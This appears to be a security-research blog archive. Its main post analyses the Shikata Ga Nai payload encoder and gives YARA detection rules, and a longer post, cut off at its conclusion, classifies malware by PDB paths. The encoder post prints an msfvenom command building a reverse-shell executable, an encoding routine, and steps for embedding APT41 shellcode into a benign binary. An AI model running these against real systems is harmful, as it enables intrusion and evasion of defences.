Category Archives: Threat Research

Shikata Ga Nai Encoder Still Going Strong

One of the most popular exploit frameworks in the world is Metasploit. Its vast library of pocket exploits, pluggable payload environment, and simplicity of execution make it the de facto base platform. Metasploit is used by pentesters, security enthusiasts, script kiddies, and even malicious actors. It is so prevalent that its user base even includes APT threat actors, as we will demonstrate later in the blog post.

Despite Metasploit's more than 15 years of existence, there are still core techniques that go undetected, allowing malicious actors to evade detection. One of these core techniques is the Shikata Ga Nai (SGN) payload encoding scheme. Modern detection systems have improved dramatically over the last several years and will often catch plain vanilla versions of known malicious methods. In many cases, though, a threat actor who knows what they are doing can slightly modify existing code to bypass detection.

Before we jump into how SGN works, we'll give a little background. When threat actors plan to attack systems, they go through an assessment of risk and reward, cycling through questions of stealth and attribution. Some of these questions include: How much effort do I need to put into not getting caught? What happens if I get caught? How long can I reasonably evade detection? Will the discovery of my presence be attributed back to me? One way APT actors have attempted to elude detection in the first place is via encoding.

We know shellcode is primarily a set of instructions designed to manipulate execution of a program in ways not originally intended. The goal is to inject this shellcode into a vulnerable process. To manually create shellcode, one can pull the opcodes from disassembled code. Raw generated opcodes often will not execute out of the box; they frequently need to be touched up and made compatible with the processor they execute on and the programming language they are used from. An encoding scheme such as SGN takes care of these incompatibilities. Also, shellcode in a non-obfuscated state can be readily recognized via static detection techniques. SGN provides obfuscation and, at first glance, randomness in the obfuscated shellcode.

Metasploit's default configuration encodes all payloads. While Metasploit contains a variety of encoders, the most popular has been SGN. The phrase "shikata ga nai" means "nothing can be done" in Japanese. It was given this name because, at the time it was created, traditional anti-virus products had difficulty detecting it. As mentioned, some AV vendors now catch vanilla implementations, but miss slightly modified variants.

SGN is a polymorphic XOR additive feedback encoder. It is polymorphic in that each creation of encoded shellcode is going to be different from the next. It accomplishes this through a variety of techniques such as dynamic instruction substitution, dynamic block ordering, randomly interchanging registers, randomizing instruction ordering, inserting junk code, using a random key, and randomizing the spacing between instructions. The XOR additive feedback piece refers to the fact that the algorithm XORs future instructions with a random key and then adds that instruction to the key, which is then used to encode the next instruction. Decoding the shellcode is a process of following the steps in reverse.
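To make the feedback idea concrete, here is a minimal Python model of XOR additive feedback encoding and decoding. It is a simplification for illustration only: real SGN output randomizes registers, instruction ordering, junk code, and whether the encoded or decoded block is folded back into the key.

import struct

def sgn_like_encode(shellcode: bytes, key: int) -> bytes:
    # Pad to a multiple of 4 so we can work in DWORD-sized blocks
    shellcode += b"\x90" * (-len(shellcode) % 4)
    out = bytearray()
    for (block,) in struct.iter_unpack("<I", shellcode):
        out += struct.pack("<I", block ^ key)
        # Additive feedback: fold the plaintext block back into the key
        key = (key + block) & 0xFFFFFFFF
    return bytes(out)

def sgn_like_decode(encoded: bytes, key: int) -> bytes:
    out = bytearray()
    for (enc,) in struct.iter_unpack("<I", encoded):
        block = enc ^ key
        out += struct.pack("<I", block)
        key = (key + block) & 0xFFFFFFFF  # same feedback step as the encoder
    return bytes(out)

payload = b"\xfc\xe8\x82\x00\x00\x00"  # any raw shellcode bytes
assert sgn_like_decode(sgn_like_encode(payload, 0xDEADBEEF), 0xDEADBEEF).startswith(payload)

The decoder stub Metasploit actually emits performs an equivalent walk in x86, with the specific registers, ordering, and feedback details randomized per build.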

Creating an SGN Encoded Payload

The following steps can be recreated with Metasploit and your choice of debugging/disassembly tools:

  1. First create a plain vanilla SGN encoded payload:
    msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.169.0.36 LPORT=80 -b "\x00" -e x86/shikata_ga_nai -f exe -o /root/Desktop/metasploit/IamNotBad.exe
  2. Open the file in a disassembler. Upon looking at the binary in a disassembler, you first notice a large number of junk instructions (Figure 1). Also, Metasploit by default does not set the memory location of the code (the .text section in this case) as writable. This will need to be set; otherwise, the shellcode will not run.


Figure 1: Junk instructions when viewing the binary in a disassembler


Figure 2: RWX Flag = E0000020


Figure 3: Skip the junk code and go directly to the algorithm, which can be done by inserting a jump instruction

Algorithm Breakdown

The algorithm consists of:

  1. Initialization key specification.
  2. Retrieve a location relative to EIP (so that instructions further along can be modified based on the address obtained)
    • Metasploit commonly uses the fstenv/fnstenv instructions to put EIP on the stack, where it can be popped into a register for use. There are other ways to obtain EIP if desired.
  3. Go through a loop to decode the remaining instructions (by default the encoded instructions all reside in the .text section)
    • Vanilla SGN zeroes out the register to be used as the counter and explicitly moves the counter value into the register, so the loop portion is obvious. The loop instruction itself is encoded, so you won’t see it until decoding has progressed far enough.
    • SGN decodes instructions at higher memory addresses (it could work toward lower addresses if it wanted to, for extra trickery). This is done by adding a value to the stored address from before (the one relative to EIP) and XORing it with the key. In the example that follows, you see the instruction XOR [eax+18h], esi at .text:00408B98.
    • The address from earlier (the one relative to EIP) is then modified, and the key may also be modified [Metasploit by default usually adds or subtracts a value somewhere relative to the address stored from before (the one relative to EIP)].
    • The loop continues until all instructions are decoded, at which point execution moves to the decoded shellcode. In this case, the reverse shell.
  4. As a side note, Shikata Ga Nai allows for multiple iterations. If multiple iterations are chosen, steps 1 through 3 are repeated after the current iteration completes.

As you can see from each of the aforementioned steps, if you’re a defender and solely relying on static detection, detection can be quite difficult. With something encoded like this, it is difficult to statically detect the specific malicious behavior without unrolling the encoded instructions. Constantly scanning memory is computationally expensive, making it less feasible. This leaves most detection platforms relying on the option of detecting via behavioral indicators or sandboxes.


Figure 4: Code before decoding


Figure 5: Instructions being decoded

For many who have been in cyber security for a while, this is not new. What is still relevant, though, is that many malicious payloads encoded with SGN are still making it past defenses and are still being used by threat actors. We noticed SGN encoded payloads still making it onto systems and decided to investigate further. The results were both rewarding and surprising, and they led to the additional detection methods discussed in the “Detection” section. It also gave us more awareness of the extent to which SGN is still being used. The following is an example of a payload we recovered from an APT actor.

Embedding a Payload

For this example, we used an existing APT41 sample and embedded the payload into a benign PE. This APT41 sample is shellcode that is Shikata Ga Nai encoded.

MD5: def46c736a825c357918473e3c02b3ef

We will take a benign PE we created (ImNotBad.exe) and we will embed the APT41 sample to show SGN in action. We create a new section called NewSec and set the section values appropriately.


Figure 6: Calculate the size of the shellcode. The start address is 12000 and the end address is 94C10, so the size is 82C10. Make sure the size falls within the data that is present.


Figure 7: Insert the shellcode into the benign PE (ImNotBad.exe)


Figure 8: The embedded shellcode can be found in the code


Figure 9: Patch the code to jump to it


Figure 10: Here are the four steps from the Shikata Ga Nai algorithm (mentioned previously) demonstrated

In Figure 11 and Figure 12, as the first set of instructions is decoded, it appears to be attempting to avoid normal execution. EA 25 D9 74 24 F4 BB => Note how the EA and 25 are inserted to cause the code to crash (jumping to a curious spot in the code). We did not investigate the crash further, but after patching the inserted bytes with NOPs, the code executes the next decode sequence.


Figure 11: First set of decoded instructions, appearing to avoid normal execution


Figure 12: Further decoded instructions, appearing to avoid normal execution

Detection

Detecting SGN encoded payloads can be difficult for a defender, especially if static detection is heavily relied upon. Decoding and unraveling the encoded instructions is necessary to identify the intended malicious purpose. Constantly scanning memory is computationally expensive, making it less feasible. This leaves most detection platforms relying on detection via behavioral indicators and sandboxes. FireEye appliances contain both static and dynamic detection components. Detection is achieved by a variety of engines, including FireEye's machine learning engine, MalwareGuard. The numerous engines within FireEye appliances serve specific purposes and have different strengths and weaknesses. Creating detection around these various engines allows FireEye to utilize each of their strengths, and correlating activity between engines allows for unique detection opportunities, including production detections that would otherwise not be possible when relying on a single engine. We were able to create production detections that correlate the different engines on the FireEye appliances to detect SGN encoded binaries with high fidelity. The current production detections take advantage of the static, dynamic, and machine learning engines within the FireEye appliance.

As an example of the complications concerned with detecting SGN, we will construct code encoded with a slightly modified version of Metasploit’s plain SGN algorithm (Figure 13): 


Figure 13: Example code for possible static detection

One of the keys to writing a good static detection rule is recognizing the unique malicious behaviors of what you are trying to detect; another is capturing as much of that behavior as possible without causing false positives (FPs). Earlier in the post we listed the core behaviors of the SGN algorithm. For the sake of illustration, let’s try to match on some of those behaviors. We’ll attempt to match on the key, the mechanism used to get EIP, and the XOR additive feedback loop.

If we were trying to detect the code in Figure 13 statically, we could use the open source tool Yara. As a first pass we could construct the following rule (Figure 14):


Figure 14: Example SGN YARA static detection rule for the code in Figure 13

In the rule in Figure 14 we have added padding bytes to try to thwart an attacker who inserts junk instructions. If an adversary realized what we were matching on, the rule could easily be defeated by inserting junk code beyond our padding. We could play the game of cat and mouse and continue to increase our padding based on what we saw, but this is not a good solution, and as we pad out more bytes the rule becomes more FP prone. Besides adding junk code, other obvious evasion techniques an attacker could use include using different registers, performing arithmetic operations to obtain values, or reordering instructions. Metasploit does a decent job randomizing the algorithm in these ways, which makes static detection more difficult. Trying to catch each modified version could be never-ending.

Static detection is a useful technique, but very limited. If this is all you rely on, you will miss much of the malicious behavior getting onto your systems. For SGN, we studied it further and identified the core behavioral pieces. We saw how it was still being used by modern malware. The following is an example hunting rule that can be used to detect some of the current common permutations created by vanilla x86-SGN in Metasploit. This rule can be further expanded upon to include additional logic if desired.

rule Hunting_Rule_ShikataGaNai
{
    meta:
        author = "Steven Miller"
    strings:
        $varInitializeAndXorCondition1_XorEAX = { B8 ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 59 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 40 | 41 | 42 | 43 | 45 | 46 | 47 ) ?? }
        $varInitializeAndXorCondition1_XorEBP = { BD ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5A | 5B | 5C | 5E | 5F ) [0-50] 31 ( 68 | 69 | 6A | 6B | 6D | 6E | 6F ) ?? }
        $varInitializeAndXorCondition1_XorEBX = { BB ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5A | 5C | 5D | 5E | 5F ) [0-50] 31 ( 58 | 59 | 5A | 5B | 5D | 5E | 5F ) ?? }
        $varInitializeAndXorCondition1_XorECX = { B9 ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 48 | 49 | 4A | 4B | 4D | 4E | 4F ) ?? }
        $varInitializeAndXorCondition1_XorEDI = { BF ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5A | 5B | 5C | 5D | 5E ) [0-50] 31 ( 78 | 79 | 7A | 7B | 7D | 7E | 7F ) ?? }
        $varInitializeAndXorCondition1_XorEDX = { BA ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 50 | 51 | 52 | 53 | 55 | 56 | 57 ) ?? }
        $varInitializeAndXorCondition2_XorEAX = { D9 74 24 F4 [0-30] B8 ?? ?? ?? ?? [0-10] ( 59 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 40 | 41 | 42 | 43 | 45 | 46 | 47 ) ?? }
        $varInitializeAndXorCondition2_XorEBP = { D9 74 24 F4 [0-30] BD ?? ?? ?? ?? [0-10] ( 58 | 59 | 5A | 5B | 5C | 5E | 5F ) [0-50] 31 ( 68 | 69 | 6A | 6B | 6D | 6E | 6F ) ?? }
        $varInitializeAndXorCondition2_XorEBX = { D9 74 24 F4 [0-30] BB ?? ?? ?? ?? [0-10] ( 58 | 59 | 5A | 5C | 5D | 5E | 5F ) [0-50] 31 ( 58 | 59 | 5A | 5B | 5D | 5E | 5F ) ?? }
        $varInitializeAndXorCondition2_XorECX = { D9 74 24 F4 [0-30] B9 ?? ?? ?? ?? [0-10] ( 58 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 48 | 49 | 4A | 4B | 4D | 4E | 4F ) ?? }
        $varInitializeAndXorCondition2_XorEDI = { D9 74 24 F4 [0-30] BF ?? ?? ?? ?? [0-10] ( 58 | 59 | 5A | 5B | 5C | 5D | 5E ) [0-50] 31 ( 78 | 79 | 7A | 7B | 7D | 7E | 7F ) ?? }
        $varInitializeAndXorCondition2_XorEDX = { D9 74 24 F4 [0-30] BA ?? ?? ?? ?? [0-10] ( 58 | 59 | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 50 | 51 | 52 | 53 | 55 | 56 | 57 ) ?? }
    condition:
        any of them
}

Thoughts

Metasploit is used by many different people for many different reasons. Some may use Metasploit for legitimate purposes such as red team engagements, research or educational tasks, while others may use the framework with malicious intent. In the latter category, FireEye has historically observed APT20, a suspected Chinese nation-state sponsored threat group, utilize Metasploit with SGN encoded payloads. APT20 is one of the many named threat groups that FireEye tracks, with a primary focus on stealing data, specifically intellectual property. Other named groups include APT41 and FIN6.

APT41, formally disclosed by FireEye Intelligence earlier this year, is a Chinese cyber threat group that has been observed carrying out financially motivated missions coinciding with cyber espionage operations; it has utilized SGN encoded payloads within custom developed backdoors. The financial threat group FIN6 has also used SGN encoded payloads to carry out its missions, which largely involve theft of payment card data from point-of-sale systems, and it has historically relied upon various publicly available tools.

FireEye has also observed numerous uncategorized threat groups utilizing payloads encoded with SGN. These are groups that FireEye tracks internally but has not formally announced. One of these groups in particular is UNC902, largely known in public threat reports as the financially motivated group TA505. FireEye has observed UNC902 extensively use SGN encoding within its payloads and we continue to see activity related to this group, as recently as October 2019. Outside of these groups, we continue to observe usage of SGN encoding within malicious samples; FireEye currently identifies hundreds of SGN encoded payloads on a monthly basis. SGN encoded payloads are not always used with the same intent, but this is one side effect of being embedded into such a popular and freely available framework. Looking forward, we expect to see continued usage of SGN encoded payloads.

Gustuff return, new features for victims

The Gustuff banking trojan is back with new features, months after initially appearing targeting financial institutions in Australia. Cisco Talos first reported on Gustuff in April. Soon after, the actors behind Gustuff started by changing the distribution hosts and later disabled their command and control (C2) infrastructure. The actors retained control of their malware through a secondary admin channel based on SMS.

The latest version of Gustuff no longer contains hardcoded package names, which dramatically lowers its static footprint compared to previous versions. On the capability side, the addition of a “poor man’s scripting engine” based on JavaScript provides the operator with the ability to execute scripts using the malware’s own internal commands backed by the power of the JavaScript language. This is very innovative in the Android malware space.

The first version of Gustuff that we analyzed was clearly based on Marcher, another banking trojan that has been active for several years. Now, Gustuff has lost some of its similarities to Marcher, displaying changes in its methodology after infection.

Today, Gustuff still relies primarily on malicious SMS messages to infect users, mainly targeting users in Australia. Although Gustuff has evolved, the best defense remains token-based two-factor authentication, such as Cisco Duo, combined with security awareness and the use of only official app stores.

Read More >>

 

Threat Roundup for October 11 to October 18

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between Oct 11 and Oct 18. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Read More

Reference:

TRU10182019 – This is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

Definitive Dossier of Devilish Debug Details – Part Deux: A Didactic Deep Dive into Data Driven Deductions

In Part One of this blog series, Steve Miller outlined what PDB paths are, how they appear in malware, how we use them to detect malicious files, and how we sometimes use them to make associations about groups and actors.

As Steve continued his research into PDB paths, we became interested in applying more general statistical analysis. The PDB path as an artifact poses an intriguing use case for a couple of reasons.

First, the PDB artifact is not directly tied to the functionality of the binary. As a byproduct of the compilation process, it contains information about the development environment, and by proxy, the malware author themselves. Rarely do we encounter static malware features with such an interesting tie to the human behind the keyboard, rather than the functionality of the file.

Second, file paths are an incredibly complex artifact with many different possible encodings. We had personally been dying to find an excuse to spend more time figuring out how to parse and encode paths in a more useful way. This presented an opportunity to dive into this space and test different approaches to representing file paths in various models.

The objectives of our project were:

  1. Build a large data set of PDB paths and apply some statistical methods to find potentially new signature terms and logic.
  2. Investigate whether applying machine learning classification approaches to this problem could improve our detection above writing hand-crafted signatures.
  3. Build a PDB classifier as a weak signal for binary analysis.

To start, we began gathering data. Our dataset, pulled from internal and external sources, started with over 200,000 samples. Once we deduplicated by PDB path, we had around 50,000 samples. Next, we needed to consistently label these samples, so we considered various labeling schemes.

Labeling Binaries With PDB Paths

For many of the binaries we had internal FireEye labels, and for others we looked up hashes on VirusTotal (VT) to have a look at their detection rates. This covered the majority of our samples. For a relatively small subset we had disagreements between our internal engine and VT results, which merited a slightly more nuanced policy. The disagreement was most often that our internal assessment determined a file to be benign, but the VT results showed a nonzero percentage of vendors detecting the file as malicious. In these cases we plotted the “VT ratio”: that is, the percentage of vendors labeling the files as malicious (Figure 1).


Figure 1: Ratio of vendors calling file bad/total number of vendors

The vast majority of these samples had VT detection ratios below 0.3, and in those cases we labeled the binaries as benign. For the remainder of samples we tried two strategies – marking them all as malicious, or removing them from the training set entirely. Our classification performance did not change much between these two policies, so in the end we scrapped the remainder of the samples to reduce label noise.
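The labeling policy can be summarized in a short sketch; the 0.3 threshold is the one visible in Figure 1, and the field names are our own rather than anything FireEye publishes:

def label_sample(internal_label: str, vt_positives: int, vt_total: int):
    """Return 'benign', 'malicious', or None (dropped from the training set)."""
    if internal_label == "malicious":
        return "malicious"
    vt_ratio = vt_positives / vt_total if vt_total else 0.0
    # Internal engine says benign, but some VT vendors disagree
    if vt_ratio < 0.3:
        return "benign"
    return None  # ambiguous: removed to reduce label noise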

Building Features

Next, we had to start building features. This is where the fun began. Looking at dozens and dozens of PDB paths, we simply started recording various things that ‘pop out’ to an analyst. As noted earlier, a file path contains tons of implicit information, beyond simply being a string-based artifact. Some analogies we have found useful are that a file path is more akin to a geographical location in its representation of a location on the file system, or like a sentence in that it reflects a series of dependent items.

To further illustrate this point, consider a simple file path such as:

C:\Users\World\Desktop\duck\Zbw138ht2aeja2.pdb (source file)

This path tells us several things:

  • This software was compiled on the system drive of the computer
  • In a user profile, under user ‘World’
  • The project is managed on the Desktop, in a folder called ‘duck’
  • The filename has a high degree of entropy and is not very easy to remember

In contrast, consider something such as:

D:\VSCORE5\BUILD\VSCore\release\EntVUtil.pdb (source file)

This indicates:

  • Compilation on an external or secondary drive
  • Within a non-user directory
  • Contains development terms such as ‘BUILD’ and ‘release’
  • With a sensible, semi-memorable file name

These differences seem relatively straightforward and make intuitive sense as to why one might be representative of malware development whereas the other represents a more “legitimate-looking” development environment.

Feature Representations

How do we represent these differences to a model? The easiest and most obvious option is to calculate some statistics on each path. Features such as folder depth, path length, entropy, and counting things such as numbers, letters, and special characters in the PDB filename are easy to compute.
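These statistics are cheap to compute; here is a rough Python sketch (the feature names are ours, chosen for illustration):

import math
from collections import Counter

def shannon_entropy(s: str) -> float:
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def simple_path_features(pdb_path: str) -> dict:
    parts = pdb_path.split("\\")
    filename = parts[-1]
    return {
        "folder_depth": len(parts) - 1,
        "path_length": len(pdb_path),
        "path_entropy": shannon_entropy(pdb_path),
        "filename_digits": sum(ch.isdigit() for ch in filename),
        "filename_letters": sum(ch.isalpha() for ch in filename),
        "filename_specials": sum(not ch.isalnum() and ch != "." for ch in filename),
    }

simple_path_features(r"C:\Users\World\Desktop\duck\Zbw138ht2aeja2.pdb")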

However, upon evaluation against our dataset, these features did not help to separate the classes very well. The following are some graphics detailing the distributions of these features between our classes of malicious and benign samples:

While there is potentially some separation between benign and malicious distributions, these features alone would likely not lead to an effective classifier (we tried). Additionally, we couldn’t easily translate these differences into explicit detection rules. There was more information in the paths that we needed to extract, so we began to look at how to encode the directory names themselves.

Normalization

As with any dataset, we had to undertake some steps to normalize the paths. For example, the occurrence of individual usernames, while perhaps interesting from an intelligence perspective, would be represented as distinct entities when in fact they have the same semantic meaning. Thus, we had to detect and replace usernames with <username> to normalize this representation. Other folder idiosyncrasies such as version numbers or randomly generated directories could similarly be normalized into <version> or <random>.

A typical normalized path might therefore go from this:

C:\Users\jsmith\Documents\Visual Studio 2013\Projects\mkzyu91952\mkzyu91952\obj\x86\Debug\mkzyu91952.pdb

To this:

c:\users\<username>\documents\visual studio 2013\projects\<random>\<random>\obj\x86\debug\mkzyu91952.pdb

You may notice that the PDB filename itself was not normalized. In this case we wanted to derive features from the filename itself, so we left it. Other approaches could be to normalize it, or even to make note that the same filename string ‘mkzyu91952’ appears earlier in the path. There are endless possible features when dealing with file paths.
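As a hedged sketch of what this normalization might look like in practice (the exact rules used are not published, so the regular expressions below are illustrative rather than FireEye's):

import re

def normalize_pdb_path(path: str) -> str:
    p = path.lower()
    # Usernames sit one directory below \users\ or \documents and settings\
    p = re.sub(r"(\\users\\)[^\\]+", r"\1<username>", p)
    p = re.sub(r"(\\documents and settings\\)[^\\]+", r"\1<username>", p)
    # Version-number-like directories, e.g. \1.2.3\ or \v1.3-53\
    p = re.sub(r"\\v?\d+(\.\d+)+[^\\]*", r"\\<version>", p)
    # Long alphanumeric directory names containing digits look randomly generated
    p = re.sub(r"\\(?=[^\\]*\d)[a-z0-9]{10,}(?=\\)", r"\\<random>", p)
    return p

print(normalize_pdb_path(
    r"C:\Users\jsmith\Documents\Visual Studio 2013\Projects\mkzyu91952\mkzyu91952\obj\x86\Debug\mkzyu91952.pdb"))
# c:\users\<username>\documents\visual studio 2013\projects\<random>\<random>\obj\x86\debug\mkzyu91952.pdb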

Directory Analysis

Once we had normalized directories, we could start to “tokenize” each directory term, to start performing some statistical analysis. Our main goal of this analysis was to see if there were any directory terms that highly corresponded to maliciousness, or see if there were any simple combinations, such as pairs or triplets, that exhibited similar behavior.

We did not find any single directory name that easily separated the classes. That would be too easy. However, we did find some general correlations with directories such as “Desktop” being somewhat more likely to be malicious, and use of shared drives such as Z: to be more indicative of a benign file. This makes intuitive sense given the more collaborative environment a “legitimate” software development process might require. There are, of course, many exceptions and this is what makes the problem tricky.

Another strong signal we found, at least in our dataset, is that when the word “Desktop” was in a non-English language and particularly in a different alphabet, the likelihood of that PDB path being tied to a malicious file was very high (Figure 2). While potentially useful, this can be indicative of geographical bias in our dataset, and further research would need to be done to see if this type of signature would generalize.


Figure 2: Unicode desktop folders from malicious samples

Various Tokenizing Schemes

In recording the directories of a file path, there are several ways you can represent the path. Let’s use this path to illustrate these different approaches:

c:\Leave\smell\Long\ruleThis.pdb (file)

Bag of Words

One very simple way is the “bag-of-words” approach, which simply treats the path as the distinct set of directory names it contains. Therefore, the aforementioned path would be represented as:

[‘c:’,’leave’,’smell’,’long’,’rulethis’]

Positional Analysis

Another approach we considered was recording the position of each directory name, as a distance from the drive. This retained more information about depth, such that a ‘build’ directory on the desktop would be treated differently than a ‘build’ directory nine directories further down. For this purpose, we excluded the drives since they would always have the same depth.

[’leave_1’,’smell_2’,’long_3’,’rulethis_4’]

N-Gram Analysis

Finally, we explored breaking paths into n-grams; that is, as a distinct set of n adjacent directories. For example, a 2-gram representation of this path might look like:

[‘c:\leave’,’leave\smell’,’smell\long’,’long\rulethis’]

We tested each of these approaches and while positional analysis and n-grams contained more information, in the end, bag-of-words seemed to generalize best. Additionally, using the bag-of-words approach made it easier to extract simple signature logic from the resultant models, as will be shown in a later section.
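All three representations take only a few lines of Python; using the example path above:

path = r"c:\Leave\smell\Long\ruleThis.pdb"
tokens = path.lower().removesuffix(".pdb").split("\\")
# ['c:', 'leave', 'smell', 'long', 'rulethis']

bag_of_words = set(tokens)

# Positional analysis: distance from the drive, drive excluded
positional = [f"{name}_{i}" for i, name in enumerate(tokens[1:], start=1)]
# ['leave_1', 'smell_2', 'long_3', 'rulethis_4']

# 2-gram analysis: adjacent directory pairs
bigrams = ["\\".join(pair) for pair in zip(tokens, tokens[1:])]
# ['c:\\leave', 'leave\\smell', 'smell\\long', 'long\\rulethis']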

Term Co-Occurrence

Since we had the bag-of-words vectors created for each path, we were also able to evaluate term co-occurrence across benign and malicious files. When we evaluated the co-occurrence of pairs of terms, we found some other interesting pairings that indeed paint two very different pictures of development environments (Figure 3).

Correlated with Malicious Files | Correlated with Benign Files
users, desktop | src, retail
documents, visual studio 2012 | obj, x64
local, temporary projects | src, x86
users, projects | src, win32
users, documents | retail, dynamic
appdata, temporary projects | src, amd64
users, x86 | src, x64

Figure 3: Correlated pairs with malicious and benign files

Keyword Lists

Our bag-of-words representation of the PDB paths gave us a set of nearly 70,000 distinct terms. The vast majority of these terms occurred once or twice in the entire dataset, resulting in what is known as a ‘long-tailed’ distribution. Figure 4 is a graph of only the top 100 most common terms in descending order.


Figure 4: Long tailed distribution of term occurrence

As you can see, the counts drop off quickly, and you are left dealing with an enormous amount of terms that may only appear a handful of times. One very simple way to solve this problem, without losing a ton of information, is to simply cut off a keyword list after a certain number of entries. For example, take the top 50 occurring folder names (across both good and bad files), and save them as a keyword list. Then match this list against every path in the dataset. To create features, one-hot encode each match.  

Rather than arbitrarily setting a cutoff, we wanted to know a bit more about the distribution and understand where might be a good place to set a limit – such that we would cover enough of the samples without drastically increasing the number of features for our model. We therefore calculated the cumulative number of samples covered by each term, as we iterated down the list from most common to least common. Figure 5 is a graph showing the result.


Figure 5: Cumulative share of samples covered by distinct terms

As you can see, with only a small fraction of the terms, we can arrive at a significant percentage of the cumulative total PDB paths. Setting a simple cutoff at about 70% of the dataset resulted in roughly 230 terms for our total vocabulary. This gave us enough information about the dataset without blowing up our model with too many features (and therefore, dimensions). One-hot encoding the presence of these terms was then the final step in featurizing the directory names present in the paths.
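A sketch of the cutoff-by-coverage idea and the one-hot encoding (the 70% figure is the one chosen above; the code is illustrative rather than the exact pipeline used):

from collections import Counter

def build_vocabulary(token_sets, coverage=0.70):
    """token_sets: one bag-of-words set of directory terms per PDB path."""
    term_counts = Counter(t for tokens in token_sets for t in tokens)
    covered, vocab = set(), []
    for term, _ in term_counts.most_common():
        vocab.append(term)
        covered.update(i for i, tokens in enumerate(token_sets) if term in tokens)
        if len(covered) / len(token_sets) >= coverage:
            break
    return vocab

def one_hot(tokens, vocab):
    return [1 if term in tokens else 0 for term in vocab]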

YARA Signatures Do Grow on Trees

Armed with some statistical features, as well as one-hot encoded keyword matches, we began to train some models on our now-featurized dataset. In doing so, we hoped to use the model training and evaluation process to give us insights into how to build better signatures. If we developed an effective classification model, that would be an added benefit.

We felt that tree-based models made sense for this use case for two reasons. First, tree-based models have worked well in the past in domains requiring a certain amount of interpretability and using a blend of quantitative and categorical features. Second, the features we used are largely things we could represent in a YARA signature. Therefore, if our models built boolean logic branches that separated large numbers of PDB files, we could potentially translate these into signatures. This is not to say that other model families could not be used to build strong classifiers. Many other options ranging from Logistic Regression to Deep Learning could be considered.

We fed our featurized training set into a Decision Tree, having set a couple of ‘hyperparameters’ such as max depth and minimum samples per leaf. We were also able to use a sliding scale of these hyperparameters to dynamically create trees and, essentially, see what shook out. Examining a trained decision tree such as the one in Figure 6 allowed us to immediately build new signatures.


Figure 6: Example decision tree and decision paths
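A minimal scikit-learn sketch of this step. The toy data and hyperparameter values are placeholders; the point is that export_text makes the learned boolean branches easy to read off and translate into signature logic:

from sklearn.tree import DecisionTreeClassifier, export_text

# Toy stand-in for the real featurized dataset: two one-hot keyword features
feature_names = ["kw_desktop", "kw_src"]
X = [[1, 0], [1, 0], [0, 1], [0, 1], [1, 1], [0, 0]]
y = [1, 1, 0, 0, 1, 0]  # 1 = malicious, 0 = benign (synthetic labels)

clf = DecisionTreeClassifier(max_depth=3, min_samples_leaf=1)
clf.fit(X, y)

# Leaves that are completely or almost-completely malicious are candidates
# for translation into YARA terms and logic
print(export_text(clf, feature_names=feature_names))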

We found several other interesting tidbits within our decision trees. Some terms that resulted in completely or almost-completely malicious subgroups are:

Directory Term | Example Hashes
\poe\ | a6b2aa2b489fb481c3cd9eab2f4f4f5c, 92904dc99938352525492cd5133b9917, 444be936b44cc6bd0cd5d0c88268fa77
\xampp\ | 4d093061c172b32bf8bef03ac44515ae, 4e6c2d60873f644ef5e06a17d85ec777, 52d2a08223d0b5cc300f067219021c90
\temporary projects\ | a785bd1eb2a8495a93a2f348c9a8ca67, c43c79812d49ca0f3b4da5aca3745090, e540076f48d7069bacb6d607f2d389d9
\stub\ | 5ea538dfc64e28ad8c4063573a46800c, adf27ce5e67d770321daf90be6f4d895, c6e23da146a6fa2956c3dd7a9314fc97

We also found the term ‘WindowsApplication1’ to be quite useful. 89% of the files in our dataset containing this directory were malicious. Cursory research indicates that this is the default directory generated when using Visual Studio to compile a Windows binary. Once again, this makes some intuitive sense for finding malware authors. Training and evaluating decision trees with various parameters turned out to be a hugely productive exercise in discovering potential new signature terms and logic.

Classification Accuracy and Findings

Since we now had a large dataset of PDB paths and features, we wanted to see if we could train a traditional classifier to separate good files from bad. Using a Random Forest with some tuning, we were able to achieve an average accuracy of 87% across 10 cross-validation folds. However, while our recall (the percentage of bad things we could identify with the model) was relatively high at 89%, our malware precision (the share of the things we called bad that were actually bad) was far too low, hovering at or below 50%. This indicates that using this model alone for malware detection would result in an unacceptably large number of false positives were we to deploy it in the wild as a singular detection platform. However, used in conjunction with other tools, it could be a useful weak signal to assist with analysis.
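For reference, the evaluation described above can be reproduced in outline with scikit-learn; the data below is a synthetic stand-in, so the metrics will not match the published numbers:

from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import cross_validate

# Synthetic stand-in for the featurized PDB dataset
X = [[i % 2, (i // 2) % 2, i % 3] for i in range(60)]
y = [i % 2 for i in range(60)]  # 1 = malicious, 0 = benign

clf = RandomForestClassifier(n_estimators=100, random_state=0)
scores = cross_validate(clf, X, y, cv=10, scoring=("accuracy", "recall", "precision"))
print(scores["test_accuracy"].mean(),
      scores["test_recall"].mean(),
      scores["test_precision"].mean())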

Conclusion and Next Steps

